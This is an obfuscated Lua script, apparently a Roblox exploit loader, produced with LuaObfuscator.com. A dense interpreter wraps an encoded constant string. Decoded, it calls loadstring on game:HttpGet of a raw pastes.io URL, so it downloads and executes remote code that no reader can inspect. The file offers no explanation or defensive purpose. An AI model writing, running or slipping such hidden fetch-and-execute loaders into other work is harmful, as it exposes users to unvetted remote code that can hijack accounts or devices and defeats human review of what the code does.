--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v91=v5(v86,v19);v19=nil;return v91;else return v86;end end end);local function v20(v31,v32,v33)if v33 then local v87=(v31/((5 -3)^(v32-(2 -(1 + 0)))))%(((880 -(282 + 595)) -1)^(((v33-(2 -(1638 -(1523 + 114)))) -(v32-1)) + (620 -(555 + 64)))) ;return v87-(v87%1) ;else local v88=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v88 + v88))>=v88) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21()local v34=0;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=1271 -(226 + 1044) ;end end end local function v22()local v36=0 -(0 -0) ;local v37;local v38;while true do if (v36==(117 -(32 + 85))) then v37,v38=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;v36=958 -((1242 -(87 + 263)) + 65) ;end if (v36==(2 -1)) then return (v38 * (472 -216)) + v37 ;end end end local function v23()local v39=180 -(67 + 113) ;local v40;local v41;local v42;local v43;while true do if ((2 -(1 -0))==v39) then return (v43 * (12302277 + 4474939)) + (v42 * (160901 -95365)) + (v41 * (189 + 67)) + v40 ;end if (v39==(997 -(915 + (1269 -(1069 + 118))))) then v40,v41,v42,v43=v1(v16,v18,v18 + ((17 -9) -5) );v18=v18 + ((32 -17) -11) ;v39=1;end end end local function v24()local v44=0 + (0 -0) ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(1 -0)) then v47=(1081 -(1020 + 60)) + 0 ;v48=(v20(v46,792 -(368 + 423) ,62 -42 ) * ((20 -(10 + 8))^(122 -90))) + v45 ;v44=444 -(416 + 26) ;end if (v44==0) then v45=v23();v46=v23();v44=3 -2 ;end if (v44==(2 + (1424 -(630 + 793)))) then if (v49==((0 -0) -0)) then if (v48==(438 -(145 + 293))) then return v50 * (0 -0) ;else local v101=430 -(44 + 386) ;while true do if (v101==(1486 -(998 + 488))) then v49=1 + 0 ;v47=0;break;end end end elseif (v49==(1677 + 370)) then return ((v48==((305 + 467) -((691 -490) + 571))) and (v50 * (((2886 -(760 + 987)) -(116 + 1022))/(0 -0)))) or (v50 * NaN) ;end return v8(v50,v49-1023 ) * (v47 + (v48/((2 + 0)^(189 -137)))) ;end if (v44==(7 -5)) then v49=v20(v46,880 -(814 + 45) ,76 -45 );v50=((v20(v46,32)==1) and  -((1914 -(1789 + 124)) + 0)) or (1 + 0) ;v44=888 -(261 + 624) ;end end end local function v25(v51)local v52;if  not v51 then v51=v23();if (v51==(766 -(745 + 21))) then return "";end end v52=v3(v16,v18,(v18 + v51) -(1 + 0) );v18=v18 + v51 ;local v53={};for v70=2 -1 , #v52 do v53[v70]=v2(v1(v3(v52,v70,v70)));end return v6(v53);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if (v54==(3 + 1)) then v63=nil;while true do if (v55==1) then local v98=0;while true do if (v98==(0 -0)) then v58=nil;v59=nil;v98=2 -1 ;end if (v98~=1) then else v55=2;break;end end end if (v55==(1772 -(1749 + 20))) then v62=nil;v63=nil;v55=1 + 3 ;end if (v55==(1326 -(1249 + 73))) then while true do if (v56==(2 + 1)) then v63=nil;while true do local v106=1145 -(466 + 679) ;while true do if (v106~=0) then else local v137=0 -0 ;local v138;while true do if (v137==0) then v138=0;while true do if (v138~=1) then else v106=2 -1 ;break;end if (v138~=(1900 -(106 + 1794))) then else if (v57~=(1 + 2)) then else local v155=0;local v156;while true do if (v155~=(0 + 0)) then else v156=0 -0 ;while true do if (v156~=0) then else for v172=1,v23() do v59[v172-(2 -1) ]=v28();end return v61;end end break;end end end if (1~=v57) then else local v157=114 -(4 + 110) ;local v158;local v159;while true do if (v157~=0) then else v158=584 -(57 + 527) ;v159=nil;v157=1428 -(41 + 1386) ;end if (v157~=1) then else while true do if (v158~=(103 -(17 + 86))) then else v159=0 + 0 ;while true do if (v159~=(0 -0)) then else local v174=0;local v175;while true do if (v174==(0 -0)) then v175=0;while true do if (v175~=(167 -(122 + 44))) then else v159=1 -0 ;break;end if (0~=v175) then else local v183=0 -0 ;while true do if ((0 + 0)~=v183) then else v61={v58,v59,nil,v60};v62=v23();v183=1 + 0 ;end if (v183~=1) then else v175=1258 -(1043 + 214) ;break;end end end end break;end end end if (1~=v159) then else v63={};v57=2;break;end end break;end end break;end end end v138=1;end end break;end end end if ((3 -2)==v106) then if (v57==(1212 -(323 + 889))) then local v144=0;local v145;local v146;while true do if (v144~=(0 -0)) then else v145=0;v146=nil;v144=581 -(361 + 219) ;end if (v144==(321 -(53 + 267))) then while true do if (v145==0) then v146=0 + 0 ;while true do if (v146~=0) then else local v160=413 -(15 + 398) ;local v161;while true do if (0~=v160) then else v161=0;while true do if (v161==0) then local v176=0;while true do if (v176~=0) then else v58={};v59={};v176=1;end if (v176==(983 -(18 + 964))) then v161=3 -2 ;break;end end end if (v161~=(1 + 0)) then else v146=1 + 0 ;break;end end break;end end end if (v146==(851 -(20 + 830))) then v60={};v57=1 + 0 ;break;end end break;end end break;end end end if (v57~=2) then else local v147=0;local v148;local v149;while true do if (v147~=(126 -(116 + 10))) then else v148=0;v149=nil;v147=1 + 0 ;end if (v147==1) then while true do if (v148==(738 -(542 + 196))) then v149=0;while true do if (v149==0) then for v163=1 -0 ,v62 do local v164=0;local v165;local v166;local v167;while true do if (1==v164) then v167=nil;while true do if (v165==(0 + 0)) then v166=v21();v167=nil;v165=1 + 0 ;end if (1~=v165) then else if (v166==(1 + 0)) then v167=v21()~=(0 -0) ;elseif (v166==2) then v167=v24();elseif (v166~=3) then else v167=v25();end v63[v163]=v167;break;end end break;end if (v164==0) then v165=0;v166=nil;v164=2 -1 ;end end end v61[3]=v21();v149=1;end if (v149==(1552 -(1126 + 425))) then for v168=406 -(118 + 287) ,v23() do local v169=0;local v170;local v171;while true do if (v169==0) then v170=0 -0 ;v171=nil;v169=1;end if ((1122 -(118 + 1003))==v169) then while true do if (0~=v170) then else v171=v21();if (v20(v171,2 -1 ,1)~=0) then else local v178=377 -(142 + 235) ;local v179;local v180;local v181;local v182;while true do if (v178==(4 -3)) then v181=nil;v182=nil;v178=1 + 1 ;end if (v178==2) then while true do if (v179==2) then local v184=0;while true do if (v184~=(977 -(553 + 424))) then else if (v20(v181,1 -0 ,1 + 0 )~=(1 + 0)) then else v182[2]=v63[v182[2 + 0 ]];end if (v20(v181,2,2)~=(1 + 0)) then else v182[3]=v63[v182[2 + 1 ]];end v184=1;end if (v184==(2 -1)) then v179=7 -4 ;break;end end end if (v179==(0 -0)) then local v185=0;while true do if (v185==1) then v179=1 + 0 ;break;end if (0~=v185) then else v180=v20(v171,2,3);v181=v20(v171,19 -15 ,759 -(239 + 514) );v185=1;end end end if (v179==(1 + 0)) then local v186=1329 -(797 + 532) ;while true do if (v186==(0 + 0)) then v182={v22(),v22(),nil,nil};if (v180==(731 -(476 + 255))) then local v194=0;while true do if (0~=v194) then else v182[1133 -(369 + 761) ]=v22();v182[4]=v22();break;end end elseif (v180==(1 + 0)) then v182[5 -2 ]=v23();elseif (v180==(3 -1)) then v182[241 -(64 + 174) ]=v23() -((1 + 1)^16) ;elseif (v180~=(3 -0)) then else local v199=0;local v200;local v201;local v202;while true do if (0~=v199) then else v200=336 -(144 + 192) ;v201=nil;v199=1;end if ((217 -(42 + 174))~=v199) then else v202=nil;while true do if (v200==(0 + 0)) then local v203=0 + 0 ;while true do if (v203~=(0 + 0)) then else v201=1504 -(363 + 1141) ;v202=nil;v203=1581 -(1183 + 397) ;end if (v203~=1) then else v200=1;break;end end end if (v200==(2 -1)) then while true do if (v201==0) then v202=0 + 0 ;while true do if (0==v202) then v182[3]=v23() -((2 + 0)^(1991 -(1913 + 62))) ;v182[3 + 1 ]=v22();break;end end break;end end break;end end break;end end end v186=1;end if (v186==(2 -1)) then v179=2;break;end end end if (v179==3) then if (v20(v181,1936 -(565 + 1368) ,3)==(3 -2)) then v182[4]=v63[v182[4]];end v58[v168]=v182;break;end end break;end if (v178~=0) then else v179=1661 -(1477 + 184) ;v180=nil;v178=1 -0 ;end end end break;end end break;end end end v57=3;break;end end break;end end break;end end end break;end end end break;end if (v56==1) then local v102=0;while true do if (v102~=1) then else v56=2;break;end if (v102==(0 + 0)) then v59=nil;v60=nil;v102=857 -(564 + 292) ;end end end if ((0 -0)==v56) then local v103=0;while true do if (v103==(0 -0)) then v57=0;v58=nil;v103=305 -(244 + 60) ;end if (v103==1) then v56=1 + 0 ;break;end end end if (v56~=(478 -(41 + 435))) then else local v104=0;local v105;while true do if (v104~=(1001 -(938 + 63))) then else v105=0;while true do if (v105==0) then local v150=0 + 0 ;while true do if (v150==1) then v105=1126 -(936 + 189) ;break;end if (v150==0) then v61=nil;v62=nil;v150=1;end end end if (v105~=(1 + 0)) then else v56=3;break;end end break;end end end end break;end if (v55==2) then local v99=1613 -(1565 + 48) ;while true do if (v99==(0 + 0)) then v60=nil;v61=nil;v99=1139 -(782 + 356) ;end if (v99==(268 -(176 + 91))) then v55=7 -4 ;break;end end end if (0~=v55) then else local v100=0 -0 ;while true do if (v100==1) then v55=1093 -(975 + 117) ;break;end if (v100~=0) then else v56=0;v57=nil;v100=1876 -(157 + 1718) ;end end end end break;end if (v54~=0) then else v55=0 + 0 ;v56=nil;v54=3 -2 ;end if (v54==1) then v57=nil;v58=nil;v54=2;end if (v54~=(6 -4)) then else v59=nil;v60=nil;v54=1021 -(697 + 321) ;end if (3==v54) then v61=nil;v62=nil;v54=10 -6 ;end end end local function v29(v64,v65,v66)local v67=v64[1];local v68=v64[2];local v69=v64[3];return function(...)local v72=v67;local v73=v68;local v74=v69;local v75=v27;local v76=1;local v77= -1;local v78={};local v79={...};local v80=v12("#",...) -1 ;local v81={};local v82={};for v89=0,v80 do if (v89>=v74) then v78[v89-v74 ]=v79[v89 + 1 ];else v82[v89]=v79[v89 + 1 ];end end local v83=(v80-v74) + 1 ;local v84;local v85;while true do local v90=0;while true do if (v90==1) then if (v85<=3) then if (v85<=1) then if (v85>0) then local v107=v84[2];local v108=v82[v84[3]];v82[v107 + 1 ]=v108;v82[v107]=v108[v84[4]];else v82[v84[2]]=v84[3]~=0 ;end elseif (v85==2) then local v113=v84[2];v82[v113]=v82[v113](v13(v82,v113 + 1 ,v77));else do return;end end elseif (v85<=5) then if (v85>4) then local v115=0;local v116;local v117;local v118;local v119;while true do if (v115==1) then v77=(v118 + v116) -1 ;v119=0;v115=2;end if (v115==0) then v116=v84[2];v117,v118=v75(v82[v116](v13(v82,v116 + 1 ,v84[3])));v115=1;end if (v115==2) then for v151=v116,v77 do local v152=0;while true do if (v152==0) then v119=v119 + 1 ;v82[v151]=v117[v119];break;end end end break;end end else local v120;local v121,v122;local v123;local v124;v82[v84[2]]=v66[v84[3]];v76=v76 + 1 ;v84=v72[v76];v82[v84[2]]=v66[v84[3]];v76=v76 + 1 ;v84=v72[v76];v124=v84[2];v123=v82[v84[3]];v82[v124 + 1 ]=v123;v82[v124]=v123[v84[4]];v76=v76 + 1 ;v84=v72[v76];v82[v84[2]]=v84[3];v76=v76 + 1 ;v84=v72[v76];v82[v84[2]]=v84[3]~=0 ;v76=v76 + 1 ;v84=v72[v76];v124=v84[2];v121,v122=v75(v82[v124](v13(v82,v124 + 1 ,v84[3])));v77=(v122 + v124) -1 ;v120=0;for v134=v124,v77 do v120=v120 + 1 ;v82[v134]=v121[v120];end v76=v76 + 1 ;v84=v72[v76];v124=v84[2];v82[v124]=v82[v124](v13(v82,v124 + 1 ,v77));v76=v76 + 1 ;v84=v72[v76];v82[v84[2]]();v76=v76 + 1 ;v84=v72[v76];do return;end end elseif (v85<=6) then v82[v84[2]]();elseif (v85==7) then v82[v84[2]]=v84[3];else v82[v84[2]]=v66[v84[3]];end v76=v76 + 1 ;break;end if (0==v90) then v84=v72[v76];v85=v84[1];v90=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403203O00682O7470733A2O2F7061737465732E696F2F7261772F634C674A37764E43744900093O0012043O00013O00122O000100023O00202O00010001000300122O000300046O000400016O000100049O0000026O000100016O00017O00",v9(),...);
